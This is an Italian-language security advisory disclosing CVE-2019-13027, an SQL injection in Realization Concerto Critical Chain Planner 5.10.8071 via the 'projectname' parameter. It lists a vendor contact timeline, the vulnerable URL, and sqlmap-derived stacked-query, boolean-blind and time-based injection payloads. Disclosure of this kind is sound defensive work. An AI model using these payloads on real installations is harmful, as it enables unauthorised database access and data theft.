
Dettagli per la divulgazione di CVE-2019-13027
Dettagli per la divulgazione di CVE-2019-13027
Cronologia contatti con il vendor: 1 luglio 2019 -> Nessuna risposta, nessuna email di risposta.
4 luglio 2019 -> Nessuna risposta, nessuna email di risposta.
8 luglio 2019 -> Email inviata, Github creato.
11 luglio 2019 -> Nessuna risposta dal vendor. Vulnerabilità divulgata.
[Tipo di vulnerabilità] SQL Injection [Codice base del prodotto interessato] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - Versione: 5.10.8071 (Altre versioni sul ramo 5.x sono probabilmente interessate. Non è possibile testare con >altri rami)
[Componente interessato] Realization Concerto Critical Chain Planner (noto anche come CCPM) 5.10.8071 ha alcuni seri problemi di sicurezza, ovvero SQL Injection in almeno nella pagina web taskupdt/taskdetails.aspx tramite il parametro "projectname"
[Tipo di attacco] Remoto
[Vettori di attacco] L'applicazione ha molti XSS/CSRF riflessi (ad esempio, in checklist/checklist), ma la parte delicata sono le SQL Injection. È necessaria una certa manomissione a seconda della versione di SQL Server e/o IDS/IPS.
URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined
ProjectName (foo) deve esistere ed essere valido. Fuzzare il resto dei parametri (o usare una richiesta reale). foo ha anche un XSS
SQL rilevato (payload da SQLMAP) Parametro: projectname (GET)
Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: projectname=foo';WAITFOR DELAY '0:0:5'-- Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: projectname=foo' AND 3676=3676-- Type: time-based blind Title: Microsoft SQL Server/Sybase time-based blind (IF) Payload: projectname=foo' WAITFOR DELAY '0:0:5'--[Vendor del prodotto] REALIZATION - https://www.realization.com/